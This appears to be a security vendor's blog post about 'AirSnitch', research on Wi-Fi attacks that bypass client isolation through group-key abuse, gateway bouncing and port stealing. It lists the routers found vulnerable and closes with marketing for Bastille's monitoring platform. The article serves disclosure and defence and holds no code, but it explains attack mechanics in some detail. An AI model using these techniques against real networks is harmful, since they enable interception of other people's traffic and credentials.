Researchers from the University of California, Riverside, and KU Leuven have demonstrated a novel wireless attack technique. The attack allows attackers on open guest networks to intercept a victim’s WPA2-Enterprise-protected traffic across access points sharing a wired distribution system.
The researchers have dubbed it “AirSnitch”, a family of Wi-Fi attacks that defeat client isolation, a widely deployed security feature meant to prevent devices on the same wireless network from attacking each other. They presented the attacks at the 2026 Network and Distributed System Security Symposium in San Diego. The attack affected every router and network the team tested, including enterprise-grade hardware from Cisco and LANCOM.
What the Attacks Enable
In many cases, these vulnerabilities enable a full MitM attack, allowing the attacker to see and modify data flowing between a victim device and the internet. Once the attacker establishes the MitM position, it can intercept all link-layer traffic, opening the door to higher-layer attacks. When traffic is unencrypted (Google recently estimated that 6 percent and 20 percent of pages loaded on Windows and Linux, respectively, still don’t use HTTPS), the attacker can view and modify everything in the clear, including authentication cookies, passwords, and payment information. Company intranets, which frequently use plaintext connections, are also exposed.
Even when HTTPS is in place, an attacker in a MitM position can intercept DNS lookup traffic, poison the victim’s DNS cache, redirect traffic via DHCP, or observe external IP addresses to determine which websites the victim visited. The researchers also demonstrated that, in their setup, the attacks can break RADIUS, the centralized authentication protocol used in enterprise networks, by intercepting RADIUS packets, brute-forcing a message authenticator, and learning the shared passphrase. This technique would allow an attacker to set up a rogue RADIUS server and a rogue access point to intercept the traffic and credentials of any legitimate client that connects.
How It Works
Unlike previous Wi-Fi attacks such as KRACK, which exploited vulnerabilities in encryption protocols themselves, AirSnitch targets the failure to properly synchronize a client’s identity across different layers of the network stack. The attacks exploit three main weaknesses.
First, most Wi-Fi implementations use a shared Group Temporal Key to protect broadcast and multicast communications. Even with client isolation enabled, all clients typically have access to this key. An attacker can abuse the GTK to wrap unicast IP traffic in a broadcast frame, spoofing the AP’s MAC address so the victim accepts the frame. Because these frames are delivered over the air rather than forwarded by the AP, the AP’s isolation restrictions cannot stop them. The Passpoint standard, designed for secure public hotspots, attempts to address this by randomizing GTKs per client, but the researchers found design flaws: the standard fails to require randomization of the GTK during several handshake types. It does not randomize a related key called the IGTK at all.
Second, many vendors enforce client isolation only at Layer 2 (the MAC/link layer) but not at Layer 3 (the IP layer). An attacker can send packets with the victim’s IP address as the destination, but the gateway’s MAC address as the Layer 2 destination. The gateway accepts and routes the packet back to the victim, effectively “bouncing” it around the isolation barrier. The researchers call this gateway bouncing.
Third, and most critically, the attacks exploit a modern adaptation of a classic Ethernet attack called port stealing. In Wi-Fi networks, each BSSID functions as a virtualized switch port. By connecting to the network using a victim’s spoofed MAC address on a different BSSID, an attacker can trick the AP’s internal switch into redirecting the victim’s traffic to the attacker’s port. The AP then encrypts that traffic using the attacker’s own session keys, meaning the attacker can decrypt everything. In the worst case, when the attacker connects to an open SSID, the victim’s traffic is forwarded in plaintext, regardless of the victim’s original security configuration.
To achieve a full bidirectional MitM, the attacker alternates between stealing the victim’s port and restoring it, using techniques like ICMP ping injection to trigger port restoration, or coordinating with an external server to periodically restore the gateway’s port mapping. The researchers demonstrated the full attack completing in about two seconds on a Netgear R8000 while a victim watched a YouTube stream, experiencing no significant lag.
What They Tested and Found Vulnerable
The researchers tested 11 devices: Netgear Nighthawk X6 R8000, Tenda RX2 Pro, D-Link DIR-3040, TP-Link Archer AXE75, ASUS RT-AX57, DD-WRT, OpenWrt, two Ubiquiti AmpliFi routers, a LANCOM LX-6500, and a Cisco Catalyst 9130. Every device they tested was vulnerable to at least one attack variant. They also tested two real university networks and successfully demonstrated downlink interception from a guest network against a WPA2-Enterprise protected SSID, with the intercepted traffic leaked in plaintext through the open guest network.
The attacks work across WPA2-Personal, WPA2-Enterprise, WPA3-Personal, and WPA3-Enterprise configurations. The cross-AP variant works wherever multiple access points share a wired distribution system, which is standard in enterprise and campus deployments.
Practical Implications
HD Moore, founder and CEO of runZero, noted that AirSnitch essentially restores the attack surface that existed before client isolation became common, comparable to the old days of ARP spoofing on open wireless networks.
Some router manufacturers have already released updates addressing portions of the attack surface. The Wi-Fi Alliance has fixed the missing IGTK randomization in Passpoint v3.4. But some vendors have told the researchers that they can only address certain underlying weaknesses by changing the hardware itself, and the lack of any industry-wide standard for client isolation means fixes will remain fragmented.
In an interview, lead researcher Xin’an Zhou said that this was likely just the beginning of the risks: “Advanced attacks can build on our primitives to [perform] cookie stealing, DNS, and cache poisoning. Our research physically wiretaps the wire altogether, so that these sophisticated attacks will work.”
The fact that many organizations lack full visibility into which wireless networks and devices are actually operating in their facilities compounds the problem. Rogue access points, misconfigured guest networks, and unauthorized devices connecting to legitimate SSIDs all create the kind of network access that AirSnitch requires.
How to Mitigate AirSnitch
AirSnitch highlights a structural gap in enterprise wireless security. Organizations often rely on client isolation and segmentation, yet they lack continuous visibility into what actually operates across their RF spectrum. A single unmanaged guest network or unauthorized device can reintroduce risk across the broader environment.
Bastille delivers Wireless Airspace Cybersecurity through a 100% passive sensor architecture that monitors the radio-frequency environment from 100 MHz to 6 GHz and Wi-Fi to 7.125 GHz. The platform creates a real-time inventory of every wireless device and network operating within the wireless environment. Security teams gain immediate awareness of unauthorized devices, rogue access points, and unexpected associations across trusted infrastructure.
In the context of AirSnitch, that visibility changes the equation. An attacker must connect to the network, manipulate the behavior of the access point, and maintain an active presence to maintain a Man-in-the-Middle position. Bastille exposes those conditions by identifying unknown devices, anomalous association patterns, and suspicious network behavior as they occur.
The platform also provides wireless device localization using patented algorithms and analysis, enabling security teams to physically locate and remove malicious devices that attempt to maintain persistent access. By integrating wireless intelligence into zero-trust, CAASM, and XDR workflows, Bastille extends security operations into domains that traditional tools do not monitor.
Client isolation alone no longer provides sufficient protection. Organizations require continuous, independent visibility into the wireless environment to detect, investigate, and respond to threats that exploit architectural weaknesses. Bastille provides that foundational layer of awareness.
